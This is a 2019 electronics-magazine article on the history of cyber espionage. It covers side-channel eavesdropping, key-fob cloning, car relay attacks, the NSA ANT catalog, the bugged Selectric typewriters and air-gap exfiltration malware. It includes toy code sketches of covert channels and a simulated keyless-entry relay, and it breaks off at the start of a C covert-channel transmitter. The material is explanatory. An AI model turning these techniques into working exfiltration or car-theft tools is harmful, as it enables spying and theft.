Silicon Chip, September 2019 (Australia’s electronics magazine)
A BRIEF HISTORY OF CYBER ESPIONAGE AND CYBER WEAPONS
Part 1 – espionage methods over the years – by Dr David Maddison
Part 1: pre-existing electronic hardware vulnerabilities and creating vulnerabilities

Spying on one’s enemies (or even one’s friends!) or sabotaging infrastructure is one of humanity’s oldest activities, but electronics vastly expanded the possible ways of doing so.
In this article, we’ll describe some fascinating espionage
methods that can be (and have been) used to take advantage
of hidden flaws in everyday equipment, allowing spies to get
their hands on all sorts of secret information.
Naturally, many such techniques are secret, but many others have been described in the open literature, and we explain some of those below.
The variety of technologies and methods of concealment
of electronic espionage is immense, so we can only survey
a portion of those, and give the most interesting examples.
The number of ways people have devised to spy on each
other is seemingly only limited by the imagination.
We found so many interesting electronic espionage techniques that this article concentrates on those which exploit vulnerabilities in existing electronics and hardware, and on techniques for creating vulnerabilities which can then be exploited later.
Next month, we’ll have a follow-up article covering other electronic spying techniques, which we don’t have room
for in this article.
Unintentional “leakage”
Many of the techniques described below can be classified
as a “side-channel attack”.
This involves the unintentional leakage of information
from a system, such as RF or optical emanations from the
device, which are an unwanted side effect of its regular operation.
We present these in chronological order, to give an idea
of the history of such exploits, which goes back further than
you might imagine. We’ll start with pre-existing hardware
vulnerabilities (side-channel attacks).
TEMPEST and teleprinters
During the Second World War, it was noticed that the plain
text from encrypted teleprinter communications could be recovered some distance away.
This is because of the significant EMI generated when the
relays within the units switched on and off. Fig.1 shows one
of the affected units, a Bell 131-B2.
To work around this problem, commanders were instructed to maintain a secure zone for 33m around the encryption
device. There were technical fixes put in place to reduce the
EMI leakage, such as adding shielding, power supply filtering (to prevent signals travelling back along supply lines)
and the use of lower-power relays which generated lower
amplitude spikes when switching.
But these efforts were not entirely successful and only reduced the distance over which information could be gathered, rather than eliminating the problem altogether.
Another problem was that while reduced power operation reduced leakage, it also limited how far apart the connected equipment could be, or how many teleprinters could
be driven at once.
The problem wasn’t just limited to teleprinters, either.
Signals from some electronic typewriters in use after WWII, including in embassies and other secure locations, could be picked up and decoded from as far away as 1km!

Fig.1 (left): a Bell 131-B2 mixer, which was used to encrypt or decrypt teleprinter signals using relay logic. Its electronic emissions could be picked up some distance away.

Fig.2: the commercially-available Orion 2.4 HX Non-Linear Junction Detector.
Due to the scope of this problem, in the early 1960s, the
USA produced a set of guidelines under the codename TEMPEST, intended to prevent enemies from gaining access to
classified information due to these types of emissions.
In some locations, such as the US embassy in Moscow,
equipment was installed in Faraday cages to significantly
reduce electronic emissions. Apparently, staff did not like
working inside them and referred to them as “meat lockers”.
For more information, see the Wikipedia article on TEMPEST at: siliconchip.com.au/link/aaqp
Interestingly, many of the TEMPEST guidelines are still
applicable today, and some of the attacks described below
would not be possible if the vulnerable systems complied
with those standards.
Non-linear junction detectors
A non-linear junction detector is a device once used to find bugs (Fig.2); it works even if the bug is powered off. It uses the principle that a non-linear junction, such as the p-n junction found in a transistor or diode, gives a characteristic response when illuminated with radio-frequency energy.
This allows out-of-place electronic devices to be detected,
eg, those hidden in walls or decorations.
Such detectors can be easily defeated, however, by a load-matching device called an isolator; the US CIA has used such isolators in its listening devices since 1968.
Black Crow
In 1970, during the Vietnam war, a phased-array antenna
system called Black Crow (AN/ASD-5) was fitted to AC-130
Spectre gunships (C-130 cargo aircraft modified for ground attack
duties). This could detect the electromagnetic emissions of
vehicle ignition systems up to 16km away (see Figs.3 & 4).
This system was initially designed for picking up submerged submarines, as a form of Magnetic Anomaly Detector, but some bright spark (no pun intended) realised that it could also be used by aircraft to pick up the emissions from the ignition systems of enemy trucks travelling along the Ho Chi Minh trail, much of which was obscured by jungle.

Fig.3 (left): a Vietnam War-era AC-130A “Spectre” gunship, one of the types outfitted with the Black Crow system. Note the side-facing radome near the front of the aircraft, along with the barrels of multiple cannons aimed in the same direction.

Fig.4 (right): the sensor operator station in a modern AC-130 aircraft, using cameras, radars and other equipment to locate enemy targets.

Fig.5: an image recovered from the LCD screen of a 440CDX laptop 10m away, through three plasterboard walls (M.G. Kuhn, University of Cambridge Computer Laboratory, 2004). The image is not perfect but is certainly readable.
Once detected by the system, there was no need to spot
the trucks visually for engagement; the output of the Black
Crow system was able to control the gunship targeting computers directly, to aim cannons at vehicles even though they
could not be seen through the dense jungle canopy.
It could also pick up radio transmitters on the ground,
such as those used by Forward Air Controllers, who relay
targeting information to aircraft.
CRT and LCD monitors (RF emissions)
While CRT monitors are rarely used today, in 1985, Dutch
researcher Wim van Eck demonstrated in open literature that
simple and cheap equipment could be used to reproduce
images from remote computer monitors.
This was done by picking up their RF emissions, an activity then thought to be restricted to major government espionage operations.
The technique came to be known as “Van Eck phreaking”.
It can also be applied to LCD monitors, including those used
in laptop computers – see Fig.5. You can read the original
paper at: siliconchip.com.au/link/aaqq
Today, Van Eck phreaking can be done with cheap software-defined radios (SDRs) with appropriate software, such
as Martin Marinov’s TempestSDR – see Fig.6.
If you want to try this, we suggest you test it on your
own computers, as using such software without the target’s
permission or knowledge is likely to be illegal and could
get you in trouble.
For more information on TempestSDR, see the video titled
“TempestSDR - Remotely Eavesdropping on Monitors via Unintentionally Radiated RF” at: siliconchip.com.au/link/aaqr
TV licence vans (UK)
Some regard them as a hoax, but the information above
about Van Eck Phreaking, and the fact that radar detector
detectors exist (note, that is not a misprint!), suggests that it
may be possible for vans to drive around and detect nearby
operating CRT television sets.
However, the number of prosecutions achieved for operating a TV without a licence in the UK was quite small.

Fig.6: a screen grab of the TempestSDR software receiving a checkerboard pattern from a remote computer (background). In the foreground window, part of the received image is shown, along with some signal spectra.
Blinking lights
In 2002, it was discovered by researchers J. Loughry and
David Umphress that the LED status lights of modems and
other data communications equipment could reveal the data
being carried by the device. No installation of malware on
connected computers was required to take advantage of
this, and the authors suggested design changes to prevent
such data leakage.
This was found to be possible even with lights observed from afar through a telescope.
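The core idea can be illustrated with a toy decoder. This is a hedged sketch, not the researchers’ method: it assumes, purely for illustration, that a status LED directly mirrors a serial data line using 8-N-1 framing, so sampling the LED’s brightness at the link’s bit rate recovers the bytes.

```python
# Hedged sketch: assume a modem's TD/RD status LED simply mirrors the
# serial line, so sampling the LED at the bit rate recovers the traffic.
# 8-N-1 framing (start bit, 8 data bits LSB-first, stop bit) is an
# illustrative assumption, not the published attack.

def byte_to_led_samples(b):
    # start bit (0), 8 data bits LSB-first, stop bit (1)
    return [0] + [(b >> i) & 1 for i in range(8)] + [1]

def decode_led_samples(samples):
    out = []
    i = 0
    while i + 10 <= len(samples):
        if samples[i] == 0:                      # start bit found
            data = samples[i + 1:i + 9]
            out.append(sum(bit << n for n, bit in enumerate(data)))
            i += 10                              # skip past the stop bit
        else:
            i += 1                               # idle line, keep looking
    return bytes(out)

samples = []
for b in b"PIN 1234":
    samples += byte_to_led_samples(b)
print(decode_led_samples(samples))               # b'PIN 1234'
```

The countermeasure the authors suggested amounts to breaking exactly this correlation between LED state and line state.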
Decoding diffuse reflections from monitors
Also in 2002, M. Kuhn at the University of Cambridge
demonstrated the reconstruction of an image from a CRT
monitor screen, using only the diffuse reflection from objects such as a wall or furniture.
This was shown to be possible even through curtains,
blinds or frosted glass.
It was determined that the contents of a CRT screen, even
with small fonts, could be established by the use of a 300mm
astronomical telescope from 60m away, observing the CRT
reflection from an object.
Having acquired the image data, mathematical image
processing was used to recover the image from the screen
– see Figs.7 & 8.
This technique is known as “optical time-domain eavesdropping”. It takes advantage of the fact that although a CRT
screen appears to have a steady image, only a tiny portion
of the screen is actually illuminated at any given time, and
the ‘persistence of vision’ of our eyes causes the illusion of
an image covering the whole screen.
So a simple light sensor can be used to pick up the changes in brightness off diffuse objects on a short time scale.
It is then possible to determine the horizontal and vertical
blanking intervals based on breaks in that illumination, to
simulate the movement of the beam across the CRT screen,
then apply the same brightness variations to reconstruct that
image without needing to observe it.
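As a hedged illustration of just the reconstruction step (the real work also involves detecting the blanking intervals and considerable signal cleanup): once the line length and horizontal blanking gap are known, rebuilding the image from the one-dimensional brightness trace is essentially a reshape.

```python
# Toy version of optical time-domain eavesdropping: a single light
# sensor sees the total reflected brightness of a CRT. Because only one
# pixel is lit at a time, the brightness trace sampled at the pixel
# clock IS the video signal; knowing the line timing lets us fold the
# 1-D trace back into a 2-D image. Sizes here are illustrative.

def reconstruct(trace, h_blank, width, height):
    """Fold a 1-D brightness trace into an image, assuming each scan
    line is `width` bright samples followed by `h_blank` dark samples
    (horizontal blanking)."""
    line_len = width + h_blank
    return [trace[row * line_len:row * line_len + width]
            for row in range(height)]

# Simulate a 4x3 "screen" serialised the way the electron beam draws it.
screen = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]
trace = []
for line in screen:
    trace.extend(line)
    trace.extend([0, 0])          # 2 samples of horizontal blanking

print(reconstruct(trace, h_blank=2, width=4, height=3))
```

In practice the blanking intervals themselves are found from the periodic dark gaps in the trace, rather than being known in advance.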
While modern LCD and OLED screens are updated in a similar scanning manner to a CRT, because the image on the screen is steady, this technique is unlikely to work.

Fig.7: a test image, displayed on a monitor which was not directly observable (eg, facing a wall, with the observer able to see the wall but not the monitor).

Fig.8: the image recovered after applying mathematical techniques to the diffuse reflection from the wall. Again, it’s not perfect but is largely legible.
Leaking acoustic and electromagnetic radiation from keyboards

Computer keyboards can leak RF radiation which can be used to decode what is being typed on them. In 2008, researchers Vuagnoux and Pasini (and many before them) demonstrated the successful reading of multiple keyboard types including PS/2, USB, wireless and laptop boards, with 95% recovery of keystrokes up to 20m away, and even through walls.

Acoustic emanations from keyboards can also be used to decode what is being typed, due to imperceptible differences in the sounds of individual keystrokes. In 2004, researchers Asonov and Agrawal used this method to train a neural network to recognise keypresses on a keyboard. The resulting accuracy was as good as one incorrect guess per 40 keystrokes, and the method worked at distances of up to 15m.

Cloning key fobs

In 2008, it was demonstrated that the KeeLoq proprietary code-hopping cipher used in many garage and car door opening systems could be compromised. The cryptographic keys used by a particular manufacturer could be recovered by measuring the power consumption of a device in one’s possession, such as a key fob, during the encryption process.

Once the cipher for a specific manufacturer is recovered, it is then possible to intercept two transmissions from a target key fob from as far away as 100m, and the device can be cloned. Furthermore, it is then possible to lock out the legitimate user of the cloned device.

Some key fobs, including older ones used for opening cars and garage doors, can be cloned without resorting to such clever tactics. Those which do not use rolling codes, just a basic handshake, are subject to a simple ‘replay attack’. In this case, recording and replaying their RF emissions may be enough to gain access. This has been demonstrated using an SDR (software-defined radio).

Breaking systems that use a weak rolling code requires a bit more refinement (but not much); with many such systems, recording the RF associated with two subsequent access attempts (or possibly even just one) can be enough to establish the code being used and allow the attacker to later produce the next code in the sequence, opening the door.

The NSA ANT Catalog

The NSA ANT Catalog is like a mail-order catalog of electronic espionage equipment available from the US National Security Agency. ANT is their Advanced Network Technology division. It was produced in 2008 and reflects items available to the NSA, US citizens and the Five Eyes intelligence alliance (which includes Australia). A sample page is shown in Fig.9.

Fig.9: just one of the dozens of pages from the NSA ANT Catalog, which lists the electronic espionage tools available to friendly government agencies. This page shows a tiny device which can be hidden in a computer monitor cable, allowing the screen contents to be remotely read when illuminated by a radar.

Fig.10: researchers demonstrated the ability to read text off a smartphone screen from reflections off a variety of objects, including the user’s eyeballs!
It was released to the public by the German magazine
Der Spiegel from an unknown source in 2013. A copy of
the catalog can be seen here: siliconchip.com.au/link/aaqs
Most of the devices involve exploits against networked
computer systems or mobile phones, and many are targeted
toward the equipment of specific manufacturers.
Highlights from the catalog include:
• COTTONMOUTH, a USB “hardware implant” that provides
a wireless bridge into a target network with the ability
to load software on target PCs
• NIGHTSTAND, which exploits weaknesses of the wireless 802.11 protocol to access wireless networks from
as far away as 13km
• SURLYSPAWN, a device to provide a signal return encoded with information from low data rate devices such as keyboards when illuminated with radar
• GOPHERSET, a software implant for GSM phone SIM cards which sends phone book, SMS and call logs from a target phone to a user-defined phone number via SMS

Reflections from eyeballs, sunglasses etc

In 2013, researchers Yi Xu et al demonstrated how text on a smartphone screen could be read by observing screen reflections in scenarios such as 1) reflections from sunglasses and a toaster, 2) reflection from an eyeball, 3) reflection from sunglasses, and 4) viewing from a long distance; they could also decode typed words using finger motion analysis – see Fig.10. You can see some videos on this subject, and the original publication, at: siliconchip.com.au/link/aaqt

Remote observation of vibrating objects to recover audio

This technique, developed by researchers at the Massachusetts Institute of Technology (MIT), is known as “passive recovery of sound from video” or the “visual microphone”. It involves visual observation of an object in a room under surveillance, and recovery of audio (including speech) from vibrations of that object, caused by sound in the room (see Fig.11).

Objects with which this technique has been successfully used include a chip packet, aluminium foil, the surface of a container of water and plant leaves.

Fig.11: “the visual microphone”; recovery of audio from video observation of a chip packet. In this case, the audio being recovered is a pure tone rendition of “Mary had a Little Lamb”.

These observations were made with a high-speed video camera at 2000-6000 frames per second (FPS), but effective results were also obtained with a consumer-grade digital SLR (DSLR) camera operating at 60 FPS.

Even though the vibrations are not visible to the naked eye, sub-pixel variations representing soundwaves can be extracted with appropriate data processing. Observations were performed at a distance of up to four metres, but longer distances are thought to be possible with appropriate optics.

For more information, see the video titled “The Visual Microphone: Passive Recovery of Sound from Video” at: siliconchip.com.au/link/aaqu
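A drastically simplified toy of the principle: sound makes the object vibrate by a sub-pixel amount, which slightly changes the brightness each camera pixel records, so averaging many pixels per frame yields a tiny signal that tracks the sound. The real system uses multi-scale phase analysis of the video; plain per-frame averaging below is only a hedged stand-in, with made-up numbers.

```python
# Toy "visual microphone": a 440 Hz tone wobbles the brightness of a
# small patch by +/-1 unit around a level of 100; averaging the patch in
# each frame (and removing the DC level) recovers the tone.
import math

FPS = 2000                           # high-speed camera frame rate
TONE_HZ = 440                        # driving tone (illustrative)
frames = []
for n in range(200):                 # 0.1 s of video
    s = math.sin(2 * math.pi * TONE_HZ * n / FPS)
    frames.append([100 + s] * 4)     # a 4-pixel patch, brightness wobbling

audio = [sum(f) / len(f) - 100 for f in frames]   # per-frame mean, DC removed

# The recovered track matches the driving tone sample-for-sample here.
expected = [math.sin(2 * math.pi * TONE_HZ * n / FPS) for n in range(200)]
print(max(abs(a - e) for a, e in zip(audio, expected)) < 1e-9)  # True
```

Note the frame rate limits the recoverable audio bandwidth, which is why the 60 FPS DSLR results (exploiting rolling-shutter effects) were so surprising.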
Remote mobile phone microphone activation
In surveillance terminology, a “roving bug” or “hot mic”
(microphone) refers to the microphone in a mobile phone
which has been activated as a listening device, whether a
phone call is in progress or not, or even if the phone appears to be turned off.
This technique is employed by intelligence agencies using
a variety of methods, including the use of a suite of smartphone hacking tools known as “Smurf Suite” for Android
and iPhone devices. This was developed by the US NSA,
as revealed by The Guardian newspaper in January 2014.
It’s possible to listen to the microphone on a phone that is
apparently turned off because some phones still have some
circuitry running even when off, and they can only be truly deactivated by removing the battery. See the video titled
“Edward Snowden: ‘Smartphones can be taken over’ - BBC
News” at: siliconchip.com.au/link/aaqv
Encryption key recovery using PITA
In 2015, researchers from the Laboratory for Experimental
Information Security at Tel Aviv University in Israel made
a demonstration at a cryptographic conference, to show the
vulnerability of computer systems to RF sniffing.
They called their invention PITA, which stands for Portable Instrument for Trace Acquisition.
They non-invasively recovered cryptographic keys from a
laptop 50cm away in only a few seconds, by picking up its RF
emissions with cheap and readily-available equipment, including an SDR (software defined radio) dongle – see Fig.12.
They alerted the developers of GnuPG, an open-source implementation of the widely used encryption standard PGP (“pretty good privacy”; not “great privacy”, apparently), which was the subject of the demonstrated attack. The software was subsequently modified to prevent this attack, although other cryptographic systems could be vulnerable to similar schemes.
For more details on PITA, see: siliconchip.com.au/link/aaqw
Spying on vehicle occupants
Many modern cars have computer systems that connect
to their manufacturers via a mobile phone network, to report performance parameters, upgrade software or for emergency assistance.
As an example, in the United States, GM’s OnStar technology (siliconchip.com.au/link/aaqx) can activate an in-car
microphone to see if the occupants need help after a crash.
It can also be used to remotely unlock a car if the keys have
been locked inside.
If the car has been stolen, this microphone can also be
used to assist the police in arresting the perpetrators.
Fig.12: the PITA device (Portable Instrument for Trace Acquisition), shown on top of a possible disguise for the device.
The US FBI (Federal Bureau of Investigation) and other agencies realised that this could also be used to spy on
people; however, a 2003 court ruling established that they
were not allowed to do so. In 2015, a hacker demonstrated
they could remotely locate, unlock and start a vehicle, but
the company modified the system to prevent this happening in future.
Mobile phone tracking
Mobile phone users can be tracked by methods including:
1) With the cooperation of the service provider, it is possible to determine which base station a handset is closest to
and the adjacent ones and, with knowledge of the power
levels and antenna patterns, a location fix to within about
50m can be obtained in urban areas.
2) A handset can broadcast its location, determined either
by a GPS receiver or by knowledge of signal strengths and
triangulation from nearby towers.
3) The location of a handset can be established by nearby
WiFi networks. The phone requires software to do this,
which is widely available.
4) Specific Apps on the phone can send one’s location to others (eg, one called Life360). This can be useful for knowing when family members will get home or coordinating
meetings, but of course, there is also the possibility that
malicious Apps could do the same.
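Method 1 above boils down to multilateration: find the point whose distances to the towers best match the distances implied by the measured signal strengths. A minimal sketch, assuming the distances have already been estimated from a path-loss model; the tower layout and coordinates are made up for illustration.

```python
# Toy multilateration: estimate a handset position from (noiseless)
# distance estimates to three base stations by brute-force grid search.
import itertools, math

towers = [(0.0, 0.0), (4000.0, 0.0), (0.0, 3000.0)]   # metres, illustrative
true_pos = (1200.0, 900.0)
dists = [math.dist(true_pos, t) for t in towers]       # "from path loss"

def locate(towers, dists, step=50):
    """Return the grid point minimising the squared distance mismatch."""
    best, best_err = None, float("inf")
    for x, y in itertools.product(range(0, 4001, step), range(0, 3001, step)):
        err = sum((math.dist((x, y), t) - d) ** 2
                  for t, d in zip(towers, dists))
        if err < best_err:
            best, best_err = (x, y), err
    return best

print(locate(towers, dists))   # → (1200, 900)
```

With real measurements the distances are noisy, which is why the quoted accuracy is about 50m in urban areas rather than exact.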
It is also possible to use these location methods to find an
injured person, as happened recently in Australia, where a
car ran off the side of the road and the driver did not know
where they were. They rang emergency services using a
mobile phone, who were then able to use the phone to locate them.
Note that almost all telecommunications and Internet
activity is recorded by or for the government in Australia,
most recently under the Telecommunications (Interception
and Access) Amendment (Data Retention) Act 2015. For details on this, see the following web page: siliconchip.com.au/link/aaqy
The author recalls how the introduction of the GSM network in Australia, finally activated in 1993, was significantly
delayed until Australian Government agencies were given
the means to access communications going through that network (this was widely reported at the time).
Signal Amplification Relay Attack (SARA)

This attack works against anything with proximity keyless entry, such as many modern cars, and some building entrances or garage doors. It does not require possession of a key, just knowledge of its approximate location. It works by making a long-range connection between a legitimate owner’s key fob and the point to be accessed – see Fig.13.

Fig.13: a simplified scheme of the SARA relay attack. Source: Francillon, Danev and Capkun, Department of Computer Science, ETH Zurich.

This attack primarily works on systems that do not require a button on the key/card to be pressed to gain access, but rather, simply require its proximity to the lock or a button press on the lock itself. This is because systems where a button is pressed on the key require access to the key.

Many cars use a system known as Passive Keyless Entry and Start (PKES), although others are also used. The principle involved is that when the key fob and vehicle are near to each other, an RF handshake occurs between the two devices. This handshake is encrypted and uses a rolling code, so just recording the exchange between the two devices will not allow you to gain access later.

However, SARA emulates the key possessor being near the vehicle or door, when in fact they are far away (say, 100m). This allows the attackers to unlock the door without having the key.

A simplified explanation of how PKES works is as follows. The car or other access point regularly emits a low frequency (LF) probe signal of 120-135kHz, which is picked up by the key’s paired RFID chip when it is less than 2m away. This then activates a microcontroller in the key, which opens a UHF channel and completes a rolling code authentication with the vehicle. The doors can then be opened or, if the key is detected as being inside the vehicle, the engine can be started. Other systems may have the key respond on an LF band rather than UHF.

A SARA attack on PKES requires two devices, one near the car, the other within range of the key fob. A long-range communications channel is then established between the two. The device near the car captures its LF emission and converts it to a convenient frequency, such as 2.5GHz. This is then received by the device near the key fob and down-converted back to the original LF frequency.

The key fob then reacts in the usual manner, and its UHF transmissions are picked up and relayed back to the other unit, and the rolling code exchange can be completed over the relay channel, as if the key is close to the vehicle. A loop antenna is used at both locations to inject and receive the LF signals from the car and key, while a standard UHF antenna can be used for picking up higher frequency signals.

This attack only works for certain cars (but there are millions of them on the road), and it requires another SARA attack to start the engine or reprogram the vehicle to accept a new key. It is suggested that criminals don’t need to start the car a second time, as they can drive it to a location and strip it, or use it once for a crime like a bank robbery. Other forms of “relay” attack work similarly.

Many vehicle thefts have been documented which are either known to or appear to have used a SARA attack, including thefts of many expensive cars. See the video titled “Car Theft: Key Fob Relay Hack Attack Explained” at: siliconchip.com.au/link/aaqz
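Why strong cryptography does not stop a relay attack can be shown in a few lines. This is a hedged toy, not any real car’s protocol: the challenge-response structure and the use of HMAC here are illustrative assumptions. The point is that the relay never breaks the code; it just carries the messages, so the car’s check passes even though the key is far away.

```python
# Toy PKES handshake plus relay. The attacker forwards the challenge
# and response unaltered between two radios, so verification succeeds
# without the attacker ever knowing the key.
import hmac, hashlib, os

KEY = os.urandom(16)                 # secret shared by car and paired fob

def car_challenge():
    return os.urandom(8)             # LF probe carrying a fresh nonce

def fob_respond(nonce):
    # fob authenticates by keyed MAC over the nonce (illustrative)
    return hmac.new(KEY, nonce, hashlib.sha256).digest()

def car_verify(nonce, response):
    expected = hmac.new(KEY, nonce, hashlib.sha256).digest()
    return hmac.compare_digest(response, expected)

nonce = car_challenge()              # car emits its LF probe...
relayed_nonce = nonce                # ...attacker forwards it 100m away
response = fob_respond(relayed_nonce)
relayed_response = response          # ...and forwards the reply back
print(car_verify(nonce, relayed_response))   # True: the door unlocks
```

The usual countermeasure is to bound the round-trip time (distance bounding), since a relay necessarily adds propagation delay that a nearby key would not.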
CREATING VULNERABILITIES IN HARDWARE
IBM Selectric typewriter keystroke logging
In 1984, it was discovered that from 1976-1984, 16 IBM
Selectric typewriters used in the US Embassy in Moscow
and the US Consulate in Leningrad had been fitted with
what would today be called a key-logging system.
These typewriters were electromechanical, with no electronics, so this was not a traditional form of hacking (see
Fig.14).
The attack was highly sophisticated and much more
complex than the Soviets were thought to be capable of.
The possibility that the typewriters might be bugged was
only established after the French discovered one of their
teleprinters had been bugged, and alerted the Americans,
which led to the “GUNMAN Project” to find these and
other bugs.
These typewriters used mechanical binary coding to
move the ‘golf ball’ print head. The position of the six
“latch interposers” on the typewriter had been modified,
and a magnet added.
The bug had magnetometers that could sense the position of the latch interposers, which had encoded on them
a 6-bit binary value which the bug compressed to four bits
and then transmitted (Fig.15).
The bugs had special circuitry to evade standard bug
sweeps, such as with non-linear junction detectors. It is
likely enemy agents had obtained access to the typewriter somewhere along the supply chain to install the bugs
(see Fig.16).
Fig.14: the IBM Selectric electric typewriter from the 1960s, showing its unique ‘golf ball’ print head. The “bugging” of these was the first known instance of key-logging for espionage. It used mechanical binary coding and mechanical digital-to-analog converters to detect the character on the golf ball being typed, then transmitted this information to a remote location.

Fig.15: this shows how the Selectric bug worked, including conversion of the mechanical 6-bit binary code to a 4-bit value for transmission. Image source: Crypto Museum (www.cryptomuseum.com)

The operation of the bug is quite complicated and there is insufficient space for a full description here. See the following website for the only detailed description of its operation on the web: siliconchip.com.au/link/aare
The full fascinating story can be
read in the declassified document
“Learning from the Enemy: The
GUNMAN Project”, United States
Cryptologic History, Series VI, Vol.
13 at: siliconchip.com.au/link/aaqo
Jumping the “Air Gap”
Computers which require very
high security are protected by an “air gap”, which basically means that the only wires running to and from those computers carry power; with no network connection, hackers cannot remotely access the systems or get data out.
Usually, people with access to air-gapped computers are
also subject to strict rules about carrying USB drives, optical media, smartphones and so on, to prevent a bad actor
from stealing the data.
But Israeli researchers at the Cyber-Security Research
Center at the Ben-Gurion University of the Negev have
devised methods by which data can be extracted from an
air-gapped computer. See the video titled “The Air-Gap
Jumpers” at: siliconchip.com.au/link/aar0
Generally, these methods require the computer to be
compromised in some manner beforehand, possibly before
it is even installed, or via malware on a USB drive smuggled in. Data can then be transmitted to remote locations,
despite the lack of networking.
* LED-it-GO: a computer’s hard drive activity light can
be made to blink on and off in a Morse Code-like pattern.
See the video titled “LED-it-GO. Jumping the Air-Gap with
a small HardDrive LED” at: siliconchip.com.au/link/aar1
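A toy version of such an on-off timing channel is easy to sketch. The durations and encoding below are illustrative assumptions, not the published parameters: a short ON period means 0, a long ON period means 1, and the receiver (e.g. a camera watching the LED) decodes by measuring each ON duration.

```python
# Toy LED timing channel: malware blinks the HDD LED with two
# distinguishable ON durations; an observer measuring each ON period
# recovers the bits. Timings are arbitrary illustrative "ticks".
SHORT, LONG, GAP = 1, 3, 1

def encode(bits):
    events = []                      # (led_state, duration) pairs
    for b in bits:
        events.append((1, LONG if b else SHORT))
        events.append((0, GAP))      # dark gap separates symbols
    return events

def decode(events):
    # keep only ON periods; a long ON is a 1, a short ON is a 0
    return [1 if dur > SHORT else 0 for state, dur in events if state == 1]

msg = [1, 0, 1, 1, 0, 0, 1]
print(decode(encode(msg)) == msg)    # True
```

The same encode/measure/decode pattern underlies several of the other exploits in this list (xLED, Fansmitter and so on), with only the physical carrier changing.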
* PowerHammer: a method by which the power consumption of the computer is altered by varying CPU utilisation. The variations encode the desired data. Power
consumption can be monitored via associated wall power
outlets and data extracted at the rate of 1000 bits/second,
or by measuring phase angle changes at the electrical junction box, at 10 bits/second.
* MOSQUITO: malware on the target computer transmits data via its speaker to the other computer at 18-24kHz,
which is not audible to most people. A second computer,
up to 9m away, uses its onboard speaker as a microphone
to pick up that signal. See the video titled “MOSQUITO:
Jump air-gaps via speaker-to-speaker communication” at:
siliconchip.com.au/link/aar2
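A sketch of how such a near-ultrasonic channel could work, assuming simple two-tone FSK with Goertzel detection at the receiver; the frequencies, symbol rate and modulation here are illustrative assumptions, not the published implementation.

```python
# Toy near-ultrasonic FSK channel: each bit is a 10 ms burst of either
# 18 kHz (0) or 19 kHz (1); the receiver compares signal power at the
# two frequencies using the Goertzel algorithm.
import math

RATE, F0, F1, N = 48000, 18000, 19000, 480   # 10 ms symbols

def tone(freq, n=N):
    return [math.sin(2 * math.pi * freq * i / RATE) for i in range(n)]

def goertzel(samples, freq):
    """Power of `samples` at `freq` via the Goertzel recurrence."""
    k = 2 * math.cos(2 * math.pi * freq / RATE)
    s1 = s2 = 0.0
    for x in samples:
        s0 = x + k * s1 - s2
        s2, s1 = s1, s0
    return s1 * s1 + s2 * s2 - k * s1 * s2

def send(bits):
    out = []
    for b in bits:
        out += tone(F1 if b else F0)
    return out

def receive(samples):
    bits = []
    for i in range(0, len(samples), N):
        sym = samples[i:i + N]
        bits.append(1 if goertzel(sym, F1) > goertzel(sym, F0) else 0)
    return bits

msg = [0, 1, 1, 0, 1, 0, 0, 1]
print(receive(send(msg)) == msg)     # True
```

Both tones sit well above typical adult hearing, which is what lets the channel operate unnoticed in an office.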
* ODINI: this attack allows data to be extracted from a
computer even when it is in a Faraday cage, which blocks
most electromagnetic radiation.
The exploit is based on the fact that only higher frequency radiation is blocked by the cage, not low frequency or
static magnetic fields. (For example, a compass will still work in a Faraday cage.)
Malware on the target computer is used to generate slowly varying magnetic fields by regulating the CPU load. A
sensor external to the Faraday cage can detect the magnetic field variations and receive the desired data. See the
video titled “ODINI: Escaping data from Faraday-caged
Air-Gapped computers” at: siliconchip.com.au/link/aar3
* MAGNETO: similar to ODINI but uses the magnetic sensor of a smartphone for the receiver. See the video titled “MAGNETO: Air-Gap Magnetic Keylogger” at: siliconchip.com.au/link/aar4
* AirHopper: uses malware to generate encoded FM
radio signals via a computer monitor, to be received by a
smartphone. See the video titled “How to leak sensitive
data from an isolated computer (air-gap) to a nearby mobile phone – AirHopper” at: siliconchip.com.au/link/aar5
* BitWhisper: malware which varies the heat output of the target computer, which can be picked up 40cm away. Allows the extraction of data such as passwords at the rate of 1-8 bits per hour. See the video titled “BitWhisper - Jumping the Air-Gap with Heat” at: siliconchip.com.au/link/aar6

Fig.16: modified power switches from Selectric typewriters, showing how power was diverted to run the bug. There were multiple generations of the bug, and this modification was not used in all of them. Some of the bugs were battery powered instead.

Fig.17: part of the OR1200 CPU (left) showing the tiny altered region involved in the A2 malicious hardware attack. One μm is one-thousandth of a millimetre.
* GSMem: malware which
generates radio signals via specific memory instructions, which
can be received by a mobile
phone. See the video titled “GSMem Breaking The Air-Gap” at:
siliconchip.com.au/link/aar7
* DiskFiltration: malware generates ultrasonic audio signals via
the hard disk actuator arm, so it can be used on computers
without speakers. See the video titled “DiskFiltration: Data
Exfiltration from Air-Gapped Computers” at: siliconchip.com.au/link/aar8
* USBee: utilises malware and an unmodified USB device to generate encoded radio signals that can be received
and decoded using GNU Radio (open source software radio). See the video titled “USBee: Jumping the air-gap with
USB” at: siliconchip.com.au/link/aar9
* Fansmitter: malware which can transmit acoustic data
from a speakerless computer via modulation of cooling fan
speed, which can be received up to 8m away at a rate of
900 bits per hour. See the video titled “Fansmitter: Leaking Data from Air-Gap Computers (clip #1)” at: siliconchip.com.au/link/aara
* aIR-Jumper is an optical and infrared exploit using malware to control the infrared illuminators of security cameras
on the same network, allowing bidirectional communication
over distances of kilometres; see the video titled “leaking
data via security cameras” at: siliconchip.com.au/link/aarb
* xLED: malware which exfiltrates information by encoding data in the blinking of the LED status lights of a network router. The lights can be observed remotely using a telescope,
at 1-2000 bits per second. See the video titled “xLED: Covert Data Exfiltration via Router LEDs” at: siliconchip.com.au/link/aarc
* VisiSploit: malware which encodes data on the computer’s LCD screen in a way not perceptible to humans (eg, fast
flickering), but which can be recovered by viewing the LCD
with a remote or hidden camera (“Optical air-gap exfiltration
attack via invisible images” is another similar technique).
* LCD TEMPEST: malware which encodes data as radio
signals generated by the computer’s video cable, which can
then be received via GNU Radio at 60-640 bits per second.
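Most of the techniques above share the same transmitter structure: malware encodes each bit of stolen data as a timed change in some physical emission. As a rough illustration only (this sketch is not taken from any of the published tools, and the 500ms symbol time is an arbitrary assumption), here is how malware like ODINI or BitWhisper could key the CPU load on and off to modulate the computer’s magnetic or thermal output:

```c
// Illustrative sketch of an air-gap covert-channel transmitter:
// a '1' bit is sent as a period of heavy computation (raising
// power draw, magnetic emissions and heat), a '0' bit as idling.
#define _POSIX_C_SOURCE 199309L
#include <time.h>

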